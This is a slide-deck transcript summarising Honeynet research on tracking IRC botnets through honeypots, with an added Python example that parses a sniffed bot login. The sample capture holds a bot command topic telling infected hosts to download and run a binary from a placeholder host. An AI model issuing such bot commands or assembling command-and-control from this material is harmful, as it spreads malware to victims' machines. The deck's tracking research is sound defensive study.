Know your Enemy: Tracking Botnets


Page 1: Know your Enemy: Tracking Botnets

Know your Enemy: Tracking Botnets

The Honeynet Project & Research Alliance

Presented by: Jonathan Dowdle

Page 2: Know your Enemy: Tracking Botnets

Motivation

• To study the activities of BotNets and their owners

Page 3: Know your Enemy: Tracking Botnets

What a Botnet is Not

Page 4: Know your Enemy: Tracking Botnets

Introduction

• What is a BotNet?

• What is a HoneyNet?

• Who are the victims?

• What vulnerabilities are used?

• What can a BotNet be used for?

Page 5: Know your Enemy: Tracking Botnets

HoneyNet

[Diagram: Internet – Honeywall – LAN of Windows Honeypots; a Management interface hangs off the Honeywall]

Page 6: Know your Enemy: Tracking Botnets

BotNet

[Diagram: several bots, each reaching the IRC Server across the Internet]

Page 7: Know your Enemy: Tracking Botnets

Method

• Setup – HoneyNet of 3 machines

• Analysis
– mwcollectd2
– drone

Page 8: Know your Enemy: Tracking Botnets

Uses of Botnets

• DDoS (Distributed Denial of Service) Attack
• Spamming
• Sniffing Traffic
• Keylogging
• Spreading Malware
• Google AdSense Abuse
• Attacking IRC Networks (similar to DDoS)
• Manipulating online polls/games
• Mass identity theft

Page 9: Know your Enemy: Tracking Botnets

Types of Bots

• Most common bots
– Agobot / Phatbot / Forbot / XtremBot
– SDBot / RBot / UrBot / UrXBot
– GT-Bots

• Less common bots
– DSNX Bots
– Q8 Bots
– kaiten
– Perl-based bots

Page 10: Know your Enemy: Tracking Botnets

How Bots Work

[Diagram: an Exploited Client downloads the bot from the Internet via FTP / TFTP / HTTP; the Exploited Client w/ Bot client then connects to the Master IRC Server]

Page 11: Know your Enemy: Tracking Botnets

How Bots Work

[Flowchart]
• Start
• Join IRC Server
• Join master’s channel
• Topic a command?
– NO: keep waiting in the channel
– YES: Execute command
• Output?
– NO: return to waiting for the next topic
– YES: Message master

Page 12: Know your Enemy: Tracking Botnets

The Server

• Unreal IRCd

• ConferenceRoom

Page 13: Know your Enemy: Tracking Botnets

HoneyNet

[Diagram repeated from Page 5: Internet – Honeywall – LAN of Windows Honeypots; Management interface on the Honeywall]

Page 14: Know your Enemy: Tracking Botnets

Tracking Botnets

• IRC login information is sniffed when bot on Honeypot connects

• Using login information gathered we can connect to master IRC server

Page 15: Know your Enemy: Tracking Botnets

Tracking Botnets -- Observing

• Commands from master can be observed in channel

• Custom IRC client is usually needed
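The two steps above, sniffing the bot's IRC login and reading the channel topic as a command, worked as an added example that is not code from the paper, the deck, or the drone tool. It parses a constructed capture of a bot's IRC session (client lines prefixed "C:", server lines "S:"; hostnames, nick, channel and passwords are made up) and assumes the bot treats a topic beginning with "." or "!" as a command.

```python
import re

# Constructed sample of one bot's IRC session as the Honeywall sniffer would
# see it. "C:" = honeypot -> server, "S:" = server -> honeypot. All names,
# passwords and the topic text are invented for illustration.
SAMPLE_CAPTURE = """\
C: PASS s3cret
C: NICK [DEU|XP]-12345
C: USER xp 0 0 :xp
S: :irc.example.invalid 001 [DEU|XP]-12345 :Welcome
C: JOIN #bots kanalpw
S: :[DEU|XP]-12345!xp@10.0.0.5 JOIN :#bots
S: :irc.example.invalid 332 [DEU|XP]-12345 #bots :.update http://update.example.invalid/bot.exe 1
"""


def parse_bot_login(capture: str) -> dict:
    """Extract the login details a tracker needs to rejoin the master's
    channel: server password, nick, USER line, channel, channel key, topic."""
    info = {"server_pass": None, "nick": None, "user": None,
            "channel": None, "channel_key": None, "topic": None}
    for line in capture.splitlines():
        direction, _, msg = line.partition(": ")
        parts = msg.split(" ")
        if direction == "C":
            cmd = parts[0].upper()
            if cmd == "PASS":
                info["server_pass"] = parts[1]
            elif cmd == "NICK":
                info["nick"] = parts[1]
            elif cmd == "USER":
                info["user"] = msg[len("USER "):]
            elif cmd == "JOIN":
                info["channel"] = parts[1]
                if len(parts) > 2:          # optional channel key
                    info["channel_key"] = parts[2]
        elif direction == "S":
            # Numeric 332 (RPL_TOPIC): ":server 332 nick #chan :topic text"
            m = re.match(r":\S+ 332 \S+ (\S+) :(.*)", msg)
            if m:
                info["topic"] = m.group(2)
    return info


def topic_is_command(topic) -> bool:
    """Mirror the flowchart's 'Topic a command?' decision. The bot command
    prefix ('.' or '!') is an assumption, not something the deck states."""
    return bool(topic) and topic[0] in ".!"
```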

Page 16: Know your Enemy: Tracking Botnets

Custom IRC Client

• drone

Page 17: Know your Enemy: Tracking Botnets

Lessons Learned

• Number of botnets
– 100 botnets over 4 months
– 35 “live” botnets as of paper’s publish date

• Number of hosts
– ~220,000 unique IP addresses joining at least one of the monitored channels
– The number may be larger due to some hosts not showing joining clients into a channel

Page 18: Know your Enemy: Tracking Botnets

Lessons Learned Cont.

• Typical Size of Botnets
– 100s – up to 50,000 hosts

• Dimension of DDoS-attacks
– 226 DDoS-attacks against 99 unique targets

Page 19: Know your Enemy: Tracking Botnets

Strengths

• Moderate learning curve
– Paper is presented in ordinary language

• Novel method of determining methods and attacks used by Botnet owners

Page 20: Know your Enemy: Tracking Botnets

Weaknesses

• Focuses only on IRC-based bots

• More data could have been provided

Page 21: Know your Enemy: Tracking Botnets

Further Research

• Vulnerability modules

• Shellcode parsing modules

• Fetch modules